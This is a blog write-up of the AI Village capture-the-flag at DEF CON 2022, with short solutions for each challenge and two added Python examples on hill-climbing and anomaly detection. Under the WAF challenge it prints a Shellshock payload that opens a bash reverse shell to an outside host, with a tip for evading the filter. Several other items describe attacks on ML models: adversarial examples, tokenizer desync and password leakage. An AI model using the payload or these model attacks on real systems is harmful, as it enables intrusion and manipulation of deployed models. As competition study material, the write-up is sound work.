Alejandro Mosquera López is an online safety expert and Kaggle Grandmaster working in cybersecurity. His main research interests are Trustworthy AI and NLP. ORCID: https://orcid.org/0000-0002-6020-3569

Tuesday, September 27, 2022

AI Village Capture the Flag @ DEFCON write up

In August 2022 I had the chance to participate in an AI-themed CTF co-located with the DEF CON 30 security (hacking) conference. This was particularly interesting since it was presented in a novel format as a Kaggle competition where the leaderboard was ranked based on the points that each of the discovered flags was providing. Despite entering the competition in its late stage I did manage to solve all the challenges but two, therefore achieving the second best score (although my final ranking was lower due to submission times being used as tie-breakers). No one was able to find the last flag corresponding to the Crop-2 challenge until after the CTF ended.

Overall, this was quite different from previous adversarial ML competitions and aligned more with the type of ML-related challenges seen in traditional CTFs. My solutions in order to achieve the flags were as follows:

  • Hotdog: Submitted a picture of a hotdog.
  • Math_1-4: Brute forced by guessing the upper and lower bounds of the expected solutions.
  • Honor Student: Solved via hill-climbing by incrementally adding noise.
  • Wifi: Obtained the flag by using argmin(embeddings) as character indexes.
  • Bad to Good: Found that negative demerits were not properly handled and that did the trick.
  • Baseball: Solved via hill-climbing after guessing the distribution for that player through grid search.
  • Inference: The hint in the challenge description gave it away. Since I knew the number of characters, I just had to try different combinations until D3FC0N showed up as accepted.
  • Leakage: Passed the username as input to the LSTM which returned the password.
  • Forensics: The flag was in the model itself which could be accessed via model.summary().
  • Token: This was a tokenizer desync attack. Replacing BLANK was the solution.
  • Deepfake: Submitted random videos from YouTube until found one that was accepted as valid.
  • Murderbots: Identified power and temperature values via anomaly detection (deviations from the mean) that were likely human related. That gave me 9 indexes and I just had to guess the last one manually.
  • Hotterdog/Theft/Salt: Generated adversarial examples with the provided models using FGS.
  • Crop_1: Generated the solution image via hill-climbing.
  • WAF: The hints led me to a well known exploit used by crypto-mining campaigns. Then it was all trial and error to figure out which portions were deemed malicious. The final step involved obfuscating the b64 with spaces.
    • () { :;}; /bin/bash -c "bash -i >& /dev/tcp/27.1.1.1/9000 0<&1
  • Secret Sloth: Could not solve this one, although I was pretty close and located the exact place where the flag was and decoded some of the letters. It could have been solved via brute force as some participants shared later :(
  • Crop_2: Ran out of time so I could not even attempt to solve this one.
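The hill-climbing loop behind Honor Student, Baseball and Crop_1 is the same black-box robustness probe a defender runs to measure how little noise moves a model's output. The following is an added example, not code from the write-up or the CTF: the scorer `score()` is an assumed toy logistic model standing in for the hosted challenge model, and `hill_climb()` only ever calls it as a black box, which is what made the approach work without access to gradients.

```python
import math
import random

# Constructed stand-in for the challenge's black-box scorer: a fixed linear
# model squashed to [0, 1]. The hill-climber below never reads these weights.
_WEIGHTS = [0.9, -0.4, 0.3, 0.7, -0.2, 0.5, 0.1, -0.8]


def score(x):
    """Assumed toy scorer: higher means closer to the target class."""
    s = sum(w * v for w, v in zip(_WEIGHTS, x))
    return 1.0 / (1.0 + math.exp(-s))


def _clip(v, lo, hi):
    return max(lo, min(hi, v))


def hill_climb(x0, target=0.9, step=0.05, bound=0.5, max_iters=5000, seed=0):
    """Coordinate-wise hill-climbing: nudge one feature by uniform noise,
    keep the change only if the black-box score strictly improves.

    bound caps how far any feature may drift from x0 (an L-infinity budget),
    so the result stays a perturbation of the original rather than an
    unrelated input. Returns (x, best_score, iterations_used)."""
    rng = random.Random(seed)  # seeded so runs are reproducible
    x = list(x0)
    best = score(x)
    for it in range(max_iters):
        if best >= target:
            return x, best, it
        i = rng.randrange(len(x))
        cand = list(x)
        nv = cand[i] + rng.uniform(-step, step)
        nv = _clip(nv, x0[i] - bound, x0[i] + bound)  # stay inside the budget
        cand[i] = _clip(nv, 0.0, 1.0)                  # stay a valid pixel/feature
        s = score(cand)
        if s > best:
            x, best = cand, s
    return x, best, max_iters


def linf_distance(x, x0):
    """Largest per-feature change, i.e. how much noise the climb needed."""
    return max(abs(a - b) for a, b in zip(x, x0))


if __name__ == "__main__":
    start = [0.5] * len(_WEIGHTS)  # constructed neutral starting input
    x, s, used = hill_climb(start)
    print(f"start score {score(start):.3f} -> {s:.3f} after {used} queries, "
          f"L-inf distance {linf_distance(x, start):.3f}")
```

The number of queries and the final L-infinity distance are the two figures worth recording when this loop is used as a robustness check: a model that reaches the target score within a tiny budget is one whose decision can be steered by noise the model owner would not notice.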
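For Murderbots, the detection step was a plain deviation-from-the-mean test over per-cell power and temperature readings. The example below is added here and is not the write-up's code or the challenge data: the readings are constructed, with a few cells given elevated values to stand in for occupied cells, and a cell is flagged when either metric's z-score exceeds a threshold.

```python
import math

# Constructed sensor readings (not the CTF data): cell index -> (power, temperature).
# Cells 2 and 6 draw unusual power; cells 9 and 13 run unusually warm.
READINGS = {
    0: (12.1, 19.8), 1: (11.9, 20.1), 2: (30.0, 23.0), 3: (12.3, 19.9),
    4: (12.0, 20.0), 5: (11.8, 20.2), 6: (29.5, 22.5), 7: (12.2, 19.7),
    8: (12.1, 20.3), 9: (11.7, 30.0), 10: (12.0, 19.9), 11: (12.4, 20.1),
    12: (11.9, 20.0), 13: (12.2, 29.0), 14: (12.0, 19.8), 15: (12.1, 20.2),
}


def zscores(values):
    """Population z-score of each value: (v - mean) / standard deviation."""
    n = len(values)
    mean = sum(values) / n
    sd = math.sqrt(sum((v - mean) ** 2 for v in values) / n)
    if sd == 0.0:
        return [0.0] * n  # all readings identical: nothing deviates
    return [(v - mean) / sd for v in values]


def anomalous_cells(readings, threshold=2.0):
    """Return the sorted cell indexes whose power or temperature deviates
    from the mean by more than `threshold` standard deviations."""
    idx = sorted(readings)
    z_power = zscores([readings[i][0] for i in idx])
    z_temp = zscores([readings[i][1] for i in idx])
    return [i for i, zp, zt in zip(idx, z_power, z_temp)
            if abs(zp) > threshold or abs(zt) > threshold]


if __name__ == "__main__":
    print("suspect cells:", anomalous_cells(READINGS))
```

One caveat a practitioner should keep in mind with this mean/standard-deviation variant: the anomalies themselves inflate the standard deviation, so with k outliers among n readings no z-score can exceed roughly sqrt((n - k) / k), and a fixed threshold of 2 will start to miss outliers once they make up more than about a fifth of the data. That masking effect is one reason the write-up's approach left a final index to guess by hand, and swapping in a median/MAD estimate is the usual fix when the proportion of anomalies is unknown.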